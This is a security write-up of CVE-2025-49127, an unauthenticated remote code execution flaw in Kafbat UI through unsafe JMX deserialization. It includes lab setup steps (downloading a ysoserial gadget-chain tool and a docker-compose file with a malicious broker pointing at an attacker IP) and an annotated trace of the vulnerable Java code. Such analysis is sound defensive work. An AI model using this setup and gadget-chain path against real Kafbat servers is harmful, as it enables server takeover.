CVE-2025-49127: Kafbat UI Remote Code Execution via JMX Unsafe Deserialization

CVE-2025-32433: Pre-Authentication Remote Code Execution in Erlang SSH
CVE-2025-32433: Pre-Authentication Remote Code Execution in Erlang SSH
July 9, 2025
Enabling IMDSv2: Strengthen Modern EC2 Security Effortlessly
Enabling IMDSv2: Strengthen Modern EC2 Security Effortlessly
July 17, 2025

July 14, 2025

CVE-2025-49127 is a crit­i­cal re­mote code ex­e­cu­tion vul­ner­a­bil­i­ty af­fect­ing Kaf­bat UI ver­sion 1.0.0. This vul­ner­a­bil­i­ty al­lows any unau­then­ti­cat­ed user to ex­e­cute ar­bi­trary code on the serv­er through un­safe de­se­ri­al­iza­tion when con­nect­ing to ma­li­cious JMX ser­vices. The is­sue stems from the ap­pli­ca­tion’s dy­nam­ic clus­ter con­fig­u­ra­tion func­tion­al­i­ty that ac­cepts user-pro­vid­ed JMX end­points with­out prop­er val­i­da­tion, lead­ing to un­safe de­se­ri­al­iza­tion at­tacks when the ap­pli­ca­tion at­tempts to con­nect to at­tack­er-con­trolled JMX servers.

CVE De­tails:

  • CVE ID: CVE-2025-49127
  • CVSS Score: Crit­i­cal
  • Af­fect­ed Ver­sion: Kaf­bat UI 1.0.0
  • Fixed Ver­sion: 1.1.0
  • Vul­ner­a­bil­i­ty Type: Un­safe De­se­ri­al­iza­tion / Re­mote Code Ex­e­cu­tion
  • At­tack Vec­tor: Net­work
  • Au­then­ti­ca­tion Re­quired: None

What is Kaf­bat UI?

Kaf­bat UI is a web-based user in­ter­face de­signed for man­ag­ing Apache Kaf­ka clus­ters. It pro­vides ad­min­is­tra­tors with an in­tu­itive dash­board to mon­i­tor, con­fig­ure, and man­age Kaf­ka en­vi­ron­ments. The ap­pli­ca­tion of­fers sev­er­al key fea­tures:

  • Clus­ter Man­age­ment: Dy­nam­ic ad­di­tion and con­fig­u­ra­tion of Kaf­ka clus­ters
  • Met­rics Col­lec­tion: In­te­gra­tion with JMX and Prometheus for mon­i­tor­ing bro­ker per­for­mance
  • Top­ic Man­age­ment: Cre­ation, dele­tion, and con­fig­u­ra­tion of Kaf­ka top­ics
  • Con­sumer Group Mon­i­tor­ing: Real-time track­ing of con­sumer group off­sets and lag
  • Schema Reg­istry In­te­gra­tion: Man­age­ment of Avro, JSON, and Pro­to­buf schemas
  • Con­nect Clus­ter Man­age­ment: In­te­gra­tion with Kaf­ka Con­nect for con­nec­tor man­age­ment

The ap­pli­ca­tion sup­ports dy­nam­ic con­fig­u­ra­tion changes, al­low­ing ad­min­is­tra­tors to add new clus­ters and mod­i­fy set­tings with­out re­quir­ing ap­pli­ca­tion restarts. This flex­i­bil­i­ty, while con­ve­nient, in­tro­duces the se­cu­ri­ty vul­ner­a­bil­i­ty when com­bined with un­safe JMX con­nec­tions.

Lab Set­up

To re­pro­duce this vul­ner­a­bil­i­ty, we need to set up a vul­ner­a­ble Kaf­bat UI en­vi­ron­ment and cre­ate the ma­li­cious in­fra­struc­ture for ex­ploita­tion.

Step 1: Pre­pare the En­vi­ron­ment

# Create working directory

mkdir kafbat-ui-cve-lab

cd kafbat-ui-cve-lab

# Download the modified ysoserial tool

wget

https://github.com/trganda/ysoserial/releases/download/v0.0.6/ysoserial-0.0.6-all.jar

# Create scripts directorymkdir scripts

Step 2: Cre­ate the Dock­er Com­pose

Con­fig­u­ra­tion

Cre­ate a docker-compose.yml file with the vul­ner­a­ble set­up:

version: '3.8'
name: "kafbat-ui-cve-lab"

services:
  zookeeper:
    image: 'confluentinc/cp-zookeeper:7.6.1'
    environment:
      ZOOKEEPER_CLIENT_PORT: 2181

  kafbat-ui:
    container_name: kafbat-ui
    image: ghcr.io/kafbat/kafka-ui:v1.0.0  # Vulnerable version
    ports:
      - 8080:8080
      - 5005:5005
    depends_on:
      - kafka0
    environment:
      KAFKA_CLUSTERS_0_NAME: local
      KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS: kafka0:29092
      KAFKA_CLUSTERS_0_METRICS_PORT: 9997
      DYNAMIC_CONFIG_ENABLED: 'true'  # Enable dynamic configuration
      JAVA_TOOL_OPTIONS: '-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005'

  kafka0:
    image: confluentinc/cp-kafka:7.2.1
    hostname: kafka0
    container_name: kafka0
    ports:
      - 9092:9092
      - 9997:9997
    environment:
      KAFKA_BROKER_ID: 1
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT,CONTROLLER:PLAINTEXT,PLAINTEXT_HOST:PLAINTEXT
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://kafka0:29092,PLAINTEXT_HOST://localhost:9092
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT
      KAFKA_OFFSETS_TOPIC_REPLICATION_FACTOR: 1
      KAFKA_GROUP_INITIAL_REBALANCE_DELAY_MS: 0
      KAFKA_TRANSACTION_STATE_LOG_MIN_ISR: 1
      KAFKA_TRANSACTION_STATE_LOG_REPLICATION_FACTOR: 1
      KAFKA_PROCESS_ROLES: 'broker,controller'
      KAFKA_NODE_ID: 1
      KAFKA_CONTROLLER_QUORUM_VOTERS: '1@kafka0:29093'
      KAFKA_LISTENERS: 'PLAINTEXT://kafka0:29092,CONTROLLER://kafka0:29093,PLAINTEXT_HOST://0.0.0.0:9092'
      KAFKA_CONTROLLER_LISTENER_NAMES: 'CONTROLLER'
      KAFKA_LOG_DIRS: '/tmp/kraft-combined-logs'
      KAFKA_JMX_PORT: 9997
      KAFKA_JMX_OPTS: -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false -Djava.rmi.server.hostname=kafka0 -Dcom.sun.management.jmxremote.rmi.port=9997

  # Malicious Kafka broker that advertises evil JMX endpoint
  kafka-malicious-broker:
    image: 'confluentinc/cp-kafka:7.2.1'
    depends_on:
      - zookeeper
    ports:
      - 9093:9093
    environment:
      KAFKA_ZOOKEEPER_CONNECT: 'zookeeper:2181'
      # Replace with your actual host IP - this is where the malicious JMX server will run
      KAFKA_ADVERTISED_LISTENERS: PLAINTEXT://YOUR_HOST_IP:9093
      KAFKA_LISTENER_SECURITY_PROTOCOL_MAP: PLAINTEXT:PLAINTEXT
      KAFKA_INTER_BROKER_LISTENER_NAME: PLAINTEXT

Step 3: Start the En­vi­ron­ment

# Replace YOUR_HOST_IP with your actual host IP
sed -i 's/YOUR_HOST_IP/192.168.1.100/g' docker-compose.yml

# Start the environment
docker-compose up -d

# Verify services are running
docker-compose ps

Step 4: Ver­i­fy Kaf­bat UI Ac­cess

Nav­i­gate to http://localhost:8080 to en­sure Kaf­bat UI is run­ning and ac­ces­si­ble.

The Analy­sis

The vul­ner­a­bil­i­ty in CVE-2025-49127 rep­re­sents a so­phis­ti­cat­ed mul­ti-lay­ered se­cu­ri­ty flaw that ex­ploits the dy­nam­ic con­fig­u­ra­tion ca­pa­bil­i­ties of Kaf­bat UI through un­safe Java de­se­ri­al­iza­tion in JMX con­nec­tions. The at­tack lever­ages the ap­pli­ca­tion’s le­git­i­mate met­rics col­lec­tion func­tion­al­i­ty to es­tab­lish con­nec­tions to at­tack­er-con­trolled JMX servers, which then re­turn ma­li­cious se­ri­al­ized ob­jects that ex­e­cute ar­bi­trary code when de­se­ri­al­ized by the client ap­pli­ca­tion.


The vul­ner­a­bil­i­ty orig­i­nates in the Ap­pli­ca­tion­Con­fig­Con­troller class, which han­dles dy­nam­ic con­fig­u­ra­tion changes through the /api/config REST end­point. When ex­am­in­ing the validateConfig method, we can see that it be­gins by con­struct­ing an ac­cess con­text us­ing AccessContext.builder().applicationConfigActions(EDIT).operationName(“validateConfig”).build(), which is in­tend­ed to en­force role-based ac­cess con­trol. How­ev­er, the crit­i­cal flaw emerges when we an­a­lyze how the de­fault con­fig­u­ra­tion of­ten has au­then­ti­ca­tion dis­abled through auth.type: DISABLED, ef­fec­tive­ly by­pass­ing this se­cu­ri­ty mech­a­nism. The method then pro­ceeds to process the in­com­ing con­fig­u­ra­tion by call­ing configDto.flatMap(config -> {, fol­lowed by an un­safe map­ping op­er­a­tion DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties()) that di­rect­ly con­verts user-pro­vid­ed in­put into in­ter­nal data struc­tures with­out any san­i­ti­za­tion or val­i­da­tion of the clus­ter con­fig­u­ra­tion con­tents.

Ap­pli­ca­tion­Con­fig­Con­troller.java – val­i­date­Con­fig method:

@Override
public Mono<ResponseEntity<ApplicationConfigValidationDTO>> validateConfig(Mono<ApplicationConfigDTO> configDto,
                                                                           ServerWebExchange exchange) {
    // ISSUE 1: Access control bypass potential
    var context = AccessContext.builder()
        .applicationConfigActions(EDIT)  // Requires EDIT permission
        .operationName("validateConfig")
        .build();
    
    return validateAccess(context)                    // RBAC check happens here
        .then(configDto)                              // Process incoming configuration
        .flatMap(config -> {
            // ISSUE 2: Unsafe mapping from DTO without sanitization
            DynamicConfigOperations.PropertiesStructure newConfig = MAPPER.fromDto(config.getProperties());
            ClustersProperties clustersProperties = newConfig.getKafka();
            
            // CRITICAL: This triggers the vulnerable validation chain
            return validateClustersConfig(clustersProperties)
                .map(validations -> new ApplicationConfigValidationDTO().clusters(validations));
        })
        .map(ResponseEntity::ok)
        .doOnEach(sig -> audit(context, sig));       // Audit after potential exploitation
}

The most crit­i­cal as­pect of this vul­ner­a­bil­i­ty lies in the sub­se­quent call to validateClustersConfig(clustersProperties), which trig­gers a val­i­da­tion chain that has the dan­ger­ous side ef­fect of ini­ti­at­ing ac­tu­al con­nec­tions to user-spec­i­fied end­points. This val­i­da­tion process is fun­da­men­tal­ly flawed be­cause it treats val­i­da­tion as an ac­tive op­er­a­tion rather than a pas­sive check, mean­ing that sim­ply sub­mit­ting a ma­li­cious con­fig­u­ra­tion can trig­ger the ex­ploita­tion re­gard­less of whether the con­fig­u­ra­tion is ul­ti­mate­ly ac­cept­ed or re­ject­ed by the sys­tem. The con­fig­u­ra­tion per­sis­tence mech­a­nism re­veals ad­di­tion­al se­cu­ri­ty flaws in the restartWithConfig method, where ma­li­cious con­fig­u­ra­tions are writ­ten di­rect­ly to disk through dynamicConfigOperations.persist(newConfig) with­out deep val­i­da­tion, and the sys­tem au­to­mat­i­cal­ly restarts with restarter.requestRestart(), load­ing the ma­li­cious con­fig­u­ra­tion sys­tem-wide and cre­at­ing a per­sis­tent at­tack vec­tor.

Ap­pli­ca­tion­Con­fig­Con­troller.java – restartWith­Con­fig method:

@Override
public Mono<ResponseEntity<Void>> restartWithConfig(Mono<RestartRequestDTO> restartRequestDto,
                                                  ServerWebExchange exchange) {
    var context = AccessContext.builder()
        .applicationConfigActions(EDIT)
        .operationName("restartWithConfig")
        .build();
    return validateAccess(context)
        .then(restartRequestDto)
        .doOnNext(restartDto -> {
            // ISSUE 3: Configuration persisted without deep validation
            var newConfig = MAPPER.fromDto(restartDto.getConfig().getProperties());
            dynamicConfigOperations.persist(newConfig);              // Writes malicious config to disk
        })
        .doOnEach(sig -> audit(context, sig))
        .doOnSuccess(dto -> restarter.requestRestart())              // ISSUE 4: Triggers app restart with malicious config
        .map(dto -> ResponseEntity.ok().build());
}

Mov­ing deep­er into the con­fig­u­ra­tion pro­cess­ing lay­er, the Dy­nam­ic­Config­Op­er­a­tions class re­veals ad­di­tion­al se­cu­ri­ty weak­ness­es in how con­fig­u­ra­tions are per­sist­ed and loaded. The persist method be­gins with a call to checkIfDynamicConfigEnabled(), which only ver­i­fies that the dy­nam­ic con­fig­u­ra­tion fea­ture is en­abled but per­forms no con­tent val­i­da­tion. The method then calls properties.initAndValidate(), but ex­am­in­ing the im­ple­men­ta­tion of this val­i­da­tion re­veals that it only per­forms ba­sic struc­tur­al val­i­da­tion through ClustersProperties::validateAndSetDefaults and does not in­spect the ac­tu­al val­ues be­ing con­fig­ured, par­tic­u­lar­ly the JMX end­point spec­i­fi­ca­tions that are cen­tral to this vul­ner­a­bil­i­ty.

Dy­nam­ic­Config­Op­er­a­tions.java – per­sist method:

public void persist(PropertiesStructure properties) {
    checkIfDynamicConfigEnabled();                       // Only checks if feature is enabled
    properties.initAndValidate();                        // ISSUE: Insufficient validation

    String yaml = serializeToYaml(properties);          // Serializes malicious config
    writeYamlToFile(yaml, dynamicConfigFilePath());     // Writes to disk without deep inspection
}

The per­sis­tence mech­a­nism it­self in­tro­duces ad­di­tion­al se­cu­ri­ty risks through the writeYamlToFile method, which se­ri­al­izes the ma­li­cious con­fig­u­ra­tion us­ing String yaml = serializeToYaml(properties) and writes it di­rect­ly to disk with Files.writeString(path, yaml, StandardOpenOption.CREATE, StandardOpenOption.WRITE, StandardOpenOption.TRUNCATE_EXISTING). This op­er­a­tion oc­curs with­out any deep con­tent in­spec­tion or val­i­da­tion of the YAML struc­ture, mean­ing that ma­li­cious JMX con­fig­u­ra­tions be­come per­ma­nent­ly stored on the filesys­tem.

Dy­nam­ic­Config­Op­er­a­tions.java – writeYamlToFile method:

@SneakyThrows
private void writeYamlToFile(String yaml, Path path) {
    // ISSUE: No content validation of YAML before writing
    if (Files.isDirectory(path)) {
        throw new ValidationException("Dynamic file path is a directory, but should be a file path");
    }
    if (!Files.exists(path.getParent())) {
        Files.createDirectories(path.getParent());
    }
    if (Files.exists(path) && !Files.isWritable(path)) {
        throw new ValidationException("File already exists and is not writable");
    }
    try {
        Files.writeString(path, yaml,                    // VULNERABLE: Writes malicious YAML
            StandardOpenOption.CREATE,
            StandardOpenOption.WRITE,
            StandardOpenOption.TRUNCATE_EXISTING
        );
    } catch (IOException e) {
        throw new ValidationException("Error writing to " + path, e);
    }
}

The con­fig­u­ra­tion load­ing process com­pounds this is­sue through the loadDynamicPropertySource method, which au­to­mat­i­cal­ly loads these po­ten­tial­ly ma­li­cious con­fig­u­ra­tions at ap­pli­ca­tion start­up us­ing new YamlPropertySourceLoader().load(“dynamicProperties”, new FileSystemResource(configPath)), cre­at­ing a per­sis­tent at­tack vec­tor that sur­vives ap­pli­ca­tion restarts.

Dy­nam­ic­Config­Op­er­a­tions.java – load­Dy­nam­icProp­er­tySource method:

@SneakyThrows
public Optional<PropertySource<?>> loadDynamicPropertySource() {
    if (dynamicConfigEnabled()) {
        Path configPath = dynamicConfigFilePath();
        if (!Files.exists(configPath) || !Files.isReadable(configPath)) {
            log.warn("Dynamic config file {} doesnt exist or not readable", configPath);
            return Optional.empty();
        }
        var propertySource = new CompositePropertySource("dynamicProperties");
        new YamlPropertySourceLoader()
            .load("dynamicProperties", new FileSystemResource(configPath))  // VULNERABLE: Loads malicious YAML
            .forEach(propertySource::addPropertySource);
        log.info("Dynamic config loaded from {}", configPath);
        return Optional.of(propertySource);
    }
    return Optional.empty();
}

The Kafka­Clus­ter­Fac­to­ry class demon­strates an­oth­er crit­i­cal vul­ner­a­bil­i­ty in the clus­ter cre­ation process. The create method con­structs clus­ter ob­jects di­rect­ly from user-pro­vid­ed con­fig­u­ra­tion prop­er­ties with­out val­i­da­tion, par­tic­u­lar­ly in how it han­dles met­rics con­fig­u­ra­tion through metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()). This method cre­ates a Met­ric­sCon­fig ob­ject where both the type and port are di­rect­ly copied from user in­put us­ing builder.type(metricsConfigData.getType()) and builder.port(metricsConfigData.getPort()), with no val­i­da­tion to en­sure these val­ues are safe or rea­son­able. The type field ac­cepts “JMX” with­out ques­tion, which trig­gers the vul­ner­a­ble code path, while the port field ac­cepts any in­te­ger val­ue spec­i­fied by the at­tack­er.

Kafka­Clus­ter­Fac­to­ry.java

Kafka­Clus­ter­Fac­to­ry.java – cre­ate method:

public KafkaCluster create(ClustersProperties properties, 
                          ClustersProperties.Cluster clusterProperties) {
    KafkaCluster.KafkaClusterBuilder builder = KafkaCluster.builder();

    builder.name(clusterProperties.getName());
    builder.bootstrapServers(clusterProperties.getBootstrapServers());  // User-controlled
    builder.properties(convertProperties(clusterProperties.getProperties()));
    builder.readOnly(clusterProperties.isReadOnly());
    
    // ... other configurations ...
    
    if (metricsConfigured(clusterProperties)) {
        // CRITICAL: Creates metrics config from user input without validation
        builder.metricsConfig(metricsConfigDataToMetricsConfig(clusterProperties.getMetrics()));
    }
    builder.originalProperties(clusterProperties);        // Preserves original malicious config
    return builder.build();
}

Kafka­Clus­ter­Fac­to­ry.java – met­ric­sCon­fig­DataTo­Met­ric­sCon­fig method:

@Nullable
private MetricsConfig metricsConfigDataToMetricsConfig(ClustersProperties.MetricsConfigData metricsConfigData) {
    if (metricsConfigData == null) {
        return null;
    }
    MetricsConfig.MetricsConfigBuilder builder = MetricsConfig.builder();
    builder.type(metricsConfigData.getType());           // ISSUE: Type not validated ("JMX" accepted)
    builder.port(metricsConfigData.getPort());           // ISSUE: Port not validated (attacker-controlled)
    builder.ssl(Optional.ofNullable(metricsConfigData.getSsl()).orElse(false));
    builder.username(metricsConfigData.getUsername());   // Can be null
    builder.password(metricsConfigData.getPassword());   // Can be null
    builder.keystoreLocation(metricsConfigData.getKeystoreLocation());
    builder.keystorePassword(metricsConfigData.getKeystorePassword());
    return builder.build();
}

Per­haps most crit­i­cal­ly, the clus­ter val­i­da­tion process in the validate method com­plete­ly fails to val­i­date JMX end­points. While the method per­forms val­i­da­tion for Kaf­ka con­nec­tions, Schema Reg­istry, KSQL, and Con­nect end­points through re­spec­tive val­i­da­tion calls, there is no cor­re­spond­ing val­i­da­tion for JMX met­rics end­points. This rep­re­sents a fun­da­men­tal de­sign flaw where the ap­pli­ca­tion val­i­dates most ex­ter­nal con­nec­tions but com­plete­ly ig­nores the se­cu­ri­ty im­pli­ca­tions of JMX con­nec­tions, al­low­ing ma­li­cious JMX con­fig­u­ra­tions to pass val­i­da­tion un­con­di­tion­al­ly.

Kafka­Clus­ter­Fac­to­ry.java – val­i­date method:

public Mono<ClusterConfigValidationDTO> validate(ClustersProperties.Cluster clusterProperties) {
    // SSL validation - not related to JMX vulnerability
    if (clusterProperties.getSsl() != null) {
        Optional<String> errMsg = KafkaServicesValidation.validateTruststore(clusterProperties.getSsl());
        if (errMsg.isPresent()) {
            return Mono.just(new ClusterConfigValidationDTO()
                .kafka(new ApplicationPropertyValidationDTO()
                    .error(true)
                    .errorMessage("Truststore not valid: " + errMsg.get())));
        }
    }

    return Mono.zip(
        // Validates Kafka connection - NOT JMX
        KafkaServicesValidation.validateClusterConnection(
            clusterProperties.getBootstrapServers(),
            convertProperties(clusterProperties.getProperties()),
            clusterProperties.getSsl()
        ),
        // Schema Registry validation (not JMX related)
        schemaRegistryConfigured(clusterProperties)
            ? KafkaServicesValidation.validateSchemaRegistry(() -> schemaRegistryClient(clusterProperties)).map(Optional::of)
            : Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),
        
        // KSQL validation (not JMX related)  
        ksqlConfigured(clusterProperties)
            ? KafkaServicesValidation.validateKsql(() -> ksqlClient(clusterProperties)).map(Optional::of)
            : Mono.<Optional<ApplicationPropertyValidationDTO>>just(Optional.empty()),

        // Connect validation (not JMX related)
        connectClientsConfigured(clusterProperties) ? 
            Flux.fromIterable(clusterProperties.getKafkaConnect())
                .flatMap(c -> KafkaServicesValidation.validateConnect(() -> connectClient(clusterProperties, c))
                    .map(r -> Tuples.of(c.getName(), r)))
                .collectMap(Tuple2::getT1, Tuple2::getT2)
                .map(Optional::of)
            : Mono.<Optional<Map<String, ApplicationPropertyValidationDTO>>>just(Optional.empty())
    ).map(tuple -> {
        var validation = new ClusterConfigValidationDTO();
        validation.kafka(tuple.getT1());
        tuple.getT2().ifPresent(validation::schemaRegistry);
        tuple.getT3().ifPresent(validation::ksqldb);
        tuple.getT4().ifPresent(validation::kafkaConnects);
        return validation;
        // CRITICAL OBSERVATION: NO JMX VALIDATION PERFORMED!
    });
}

The vul­ner­a­bil­i­ty is trig­gered au­to­mat­i­cal­ly through the Clus­tersSta­tis­tic­sS­ched­uler, which con­tains a sched­uled method an­no­tat­ed with @Scheduled(fixedRateString = “${kafka.update-metrics-rate-millis:30000}”) that ex­e­cutes every 30 sec­onds by de­fault. This sched­uler it­er­ates through all con­fig­ured clus­ters us­ing Flux.fromIterable(clustersStorage.getKafkaClusters()) and calls statisticsService.updateCache(cluster) for each one, in­clud­ing any ma­li­cious clus­ters that have been con­fig­ured. The use of .parallel().runOn(Schedulers.parallel()) means that mul­ti­ple clus­ters are processed si­mul­ta­ne­ous­ly, and the fi­nal .block() call makes the en­tire op­er­a­tion syn­chro­nous, mean­ing that ex­ploita­tion of one clus­ter can po­ten­tial­ly af­fect the sta­bil­i­ty of the en­tire ap­pli­ca­tion.

Clus­tersSta­tis­tic­sS­ched­uler.java – up­dat­eS­ta­tis­tics method:

@Scheduled(fixedRateString = "${kafka.update-metrics-rate-millis:30000}")
public void updateStatistics() {
    Flux.fromIterable(clustersStorage.getKafkaClusters())    // Includes malicious clusters
        .parallel()
        .runOn(Schedulers.parallel())
        .flatMap(cluster -> {
            log.debug("Start getting metrics for kafkaCluster: {}", cluster.getName());
            return statisticsService.updateCache(cluster)    // TRIGGERS VULNERABILITY
                .doOnSuccess(m -> log.debug("Metrics updated for cluster: {}", cluster.getName()));
        })
        .then()
        .block();                                           // Synchronous execution
}

The Sta­tis­tic­sSer­vice or­ches­trates the met­rics col­lec­tion process through its getStatistics method, which in­cludes a call to metricsCollector.getBrokerMetrics(cluster, description.getNodes()) as part of a larg­er Mono.zip op­er­a­tion. This call oc­curs with­in the nor­mal ap­pli­ca­tion flow and is not treat­ed as a po­ten­tial­ly dan­ger­ous op­er­a­tion, mean­ing there are no ad­di­tion­al se­cu­ri­ty mea­sures or safe­guards ap­plied. The method re­trieves bro­ker nodes from the Kaf­ka clus­ter de­scrip­tion and pass­es them di­rect­ly to the met­rics col­lec­tor, which then at­tempts to col­lect met­rics from each node us­ing the con­fig­ured JMX set­tings.

Sta­tis­tic­sSer­vice.java – get­Sta­tis­tics method:

private Mono<Statistics> getStatistics(KafkaCluster cluster) {
    return adminClientService.get(cluster).flatMap(ac ->
        ac.describeCluster().flatMap(description ->
            ac.updateInternalStats(description.getController()).then(
                Mono.zip(
                    List.of(
                        metricsCollector.getBrokerMetrics(cluster, description.getNodes()),  // VULNERABLE CALL
                        getLogDirInfo(description, ac),
                        featureService.getAvailableFeatures(ac, cluster, description),
                        loadTopicConfigs(cluster),
                        describeTopics(cluster)),
                    results ->
                        Statistics.builder()
                            .status(ServerStatusDTO.ONLINE)
                            .clusterDescription(description)
                            .version(ac.getVersion())
                            .metrics((Metrics) results[0])                    // Contains exploited metrics
                            .logDirInfo((InternalLogDirStats) results[1])
                            .features((List<ClusterFeature>) results[2])
                            .topicConfigs((Map<String, List<ConfigEntry>>) results[3])
                            .topicDescriptions((Map<String, TopicDescription>) results[4])
                            .build()
                ))))
        .doOnError(e -> log.error("Failed to collect cluster {} info", cluster.getName(), e))
        .onErrorResume(e -> Mono.just(Statistics.empty().toBuilder().lastKafkaException(e).build()));
}

The Met­ric­sCol­lec­tor class con­tains the log­ic that de­ter­mines whether to use JMX or Prometheus for met­rics col­lec­tion. In the getMetrics method, the de­ci­sion is made through a sim­ple type check: if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)), which re­veals that JMX is the de­fault choice when no type is spec­i­fied or when ex­plic­it­ly set to “JMX”. This de­fault be­hav­ior is dan­ger­ous be­cause it means that any clus­ter con­fig­u­ra­tion that in­cludes met­rics set­tings will at­tempt JMX con­nec­tions un­less ex­plic­it­ly con­fig­ured oth­er­wise. The method then makes a di­rect call to jmxMetricsRetriever.retrieve(kafkaCluster, node), which ini­ti­ates the vul­ner­a­ble con­nec­tion process.

Met­ric­sCol­lec­tor.java – get­Bro­ker­Met­rics and get­Met­rics meth­ods:

public Mono<Metrics> getBrokerMetrics(KafkaCluster cluster, Collection<Node> nodes) {
    return Flux.fromIterable(nodes)
        .flatMap(n -> getMetrics(cluster, n).map(lst -> Tuples.of(n, lst)))   // VULNERABLE: Processes each node
        .collectMap(Tuple2::getT1, Tuple2::getT2)
        .map(nodeMetrics -> collectMetrics(cluster, nodeMetrics))
        .defaultIfEmpty(Metrics.empty());
}

private Mono<List<RawMetric>> getMetrics(KafkaCluster kafkaCluster, Node node) {
    Flux<RawMetric> metricFlux = Flux.empty();
    if (kafkaCluster.getMetricsConfig() != null) {
        String type = kafkaCluster.getMetricsConfig().getType();
        // CRITICAL: JMX type triggers vulnerable code path
        if (type == null || type.equalsIgnoreCase(MetricsConfig.JMX_METRICS_TYPE)) {
            metricFlux = jmxMetricsRetriever.retrieve(kafkaCluster, node);     // VULNERABLE CALL
        } else if (type.equalsIgnoreCase(MetricsConfig.PROMETHEUS_METRICS_TYPE)) {
            metricFlux = prometheusMetricsRetriever.retrieve(kafkaCluster, node);
        }
    }
    return metricFlux.collectList();
}

The core of the vul­ner­a­bil­i­ty re­sides in the Jmx­Met­ric­sRe­triev­er class, specif­i­cal­ly in the retrieveSync method. This method per­forms un­safe string con­cate­na­tion to con­struct the JMX URL us­ing String jmxUrl = JMX_URL + node.host() + “:” + c.getMetricsConfig().getPort() + “/” + JMX_SERVICE_TYPE. Break­ing down this con­struc­tion re­veals the se­cu­ri­ty flaw: JMX_URL is the con­stant “ser­vice:jmx:rmi:///jndi/rmi://”, node.host() comes di­rect­ly from the user-con­trolled boot­strap servers con­fig­u­ra­tion, c.getMetricsConfig().getPort() comes from the user-con­trolled met­rics port con­fig­u­ra­tion, and JMX_SERVICE_TYPE is the con­stant “jmxr­mi”. This re­sults in a URL like “ser­vice:jmx:rmi:///jndi/rmi://AT­TACK­ER_HOST:AT­TACK­ER_PORT/jmxr­mi” where both the host and port are com­plete­ly con­trolled by the at­tack­er.

Jmx­Met­ric­sRe­triev­er.java

Jmx­Met­ric­sRe­triev­er.java – re­trieveSync method:

@SneakyThrows
private List<RawMetric> retrieveSync(KafkaCluster c, Node node) {
    // VULNERABILITY 1: Unsafe string concatenation with user-controlled input
    String jmxUrl = JMX_URL + node.host() + ":" + c.getMetricsConfig().getPort() + "/" + JMX_SERVICE_TYPE;
    /*
     * Breaking down the URL construction:
     * - JMX_URL = "service:jmx:rmi:///jndi/rmi://"  (constant)
     * - node.host() = USER CONTROLLED via bootstrapServers config
     * - c.getMetricsConfig().getPort() = USER CONTROLLED via metrics.port config  
     * - JMX_SERVICE_TYPE = "jmxrmi" (constant)
     * 
     * Result: service:jmx:rmi:///jndi/rmi://ATTACKER_HOST:ATTACKER_PORT/jmxrmi
     */
    
    log.debug("Collection JMX metrics for {}", jmxUrl);
    List<RawMetric> result = new ArrayList<>();
    
    // VULNERABILITY 2: Connects to attacker-controlled endpoint
    withJmxConnector(jmxUrl, c, jmxConnector -> getMetricsFromJmx(jmxConnector, result));
    
    log.debug("{} metrics collected for {}", result.size(), jmxUrl);
    return result;
}

The ac­tu­al con­nec­tion at­tempt oc­curs in the withJmxConnector method, which first pre­pares the con­nec­tion en­vi­ron­ment through prepareJmxEnvAndSetThreadLocal(c) and then cre­ates a JMX con­nec­tor us­ing JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env). The crit­i­cal vul­ner­a­bil­i­ty is trig­gered when the code calls connector.connect(env), which ini­ti­ates an RMI hand­shake with the at­tack­er-con­trolled serv­er. This con­nec­tion process is where the un­safe de­se­ri­al­iza­tion oc­curs, as the JMX pro­to­col in­her­ent­ly uses Java se­ri­al­iza­tion for com­mu­ni­ca­tion be­tween client and serv­er.

Jmx­Met­ric­sRe­triev­er.java – with­Jmx­Con­nec­tor method:

private void withJmxConnector(String jmxUrl,
                              KafkaCluster c,
                              Consumer<JMXConnector> consumer) {
    var env = prepareJmxEnvAndSetThreadLocal(c);                    // Prepare connection environment
    try (JMXConnector connector = JMXConnectorFactory.newJMXConnector(new JMXServiceURL(jmxUrl), env)) {
        try {
            // VULNERABILITY 3: Unsafe connection to attacker endpoint
            connector.connect(env);
            /*
             * This is where the deserialization vulnerability is triggered:
             * 1. JMXConnector.connect() initiates RMI handshake
             * 2. RMI protocol uses Java serialization for object exchange
             * 3. Malicious JMX server returns crafted serialized objects
             * 4. Client-side deserialization occurs without filtering
             * 5. Gadget chains (e.g., CommonsCollections) execute arbitrary code
             */
        } catch (Exception exception) {
            log.error("Error connecting to {}", jmxUrl, exception);
            return;                                                // Early return on connection failure
        }
        consumer.accept(connector);                                // Process successful connection
    } catch (Exception e) {
        log.error("Error getting jmx metrics from {}", jmxUrl, e);
    } finally {
        JmxSslSocketFactory.clearThreadLocalContext();            // Clean up SSL context
    }
}

Dur­ing the RMI hand­shake and sub­se­quent JMX op­er­a­tions, mul­ti­ple de­se­ri­al­iza­tion points ex­ist where ma­li­cious ob­jects can be in­ject­ed. The ini­tial con­nec­tion hand­shake in­volves ob­ject ex­change be­tween client and serv­er, where the serv­er can re­turn craft­ed se­ri­al­ized ob­jects that trig­ger de­se­ri­al­iza­tion on the client side. Ad­di­tion­al de­se­ri­al­iza­tion oc­curs dur­ing MBean op­er­a­tions when the code calls msc.queryNames(new ObjectName(CANONICAL_NAME_PATTERN), null) to query for MBeans match­ing “kaf­ka.serv­er*:*”, and when in­di­vid­ual at­trib­ut­es are re­trieved through msc.getAttribute(objectName, attrNames[i].getName()). Each of these op­er­a­tions in­volves se­ri­al­iza­tion and de­se­ri­al­iza­tion of Java ob­jects, pro­vid­ing mul­ti­ple op­por­tu­ni­ties for ex­ploita­tion.

Jmx­Met­ric­sRe­triev­er.java – get­Met­rics­FromJmx method:

@SneakyThrows
private void getMetricsFromJmx(JMXConnector jmxConnector, List<RawMetric> sink) {
    MBeanServerConnection msc = jmxConnector.getMBeanServerConnection();     // Get MBean server connection
    
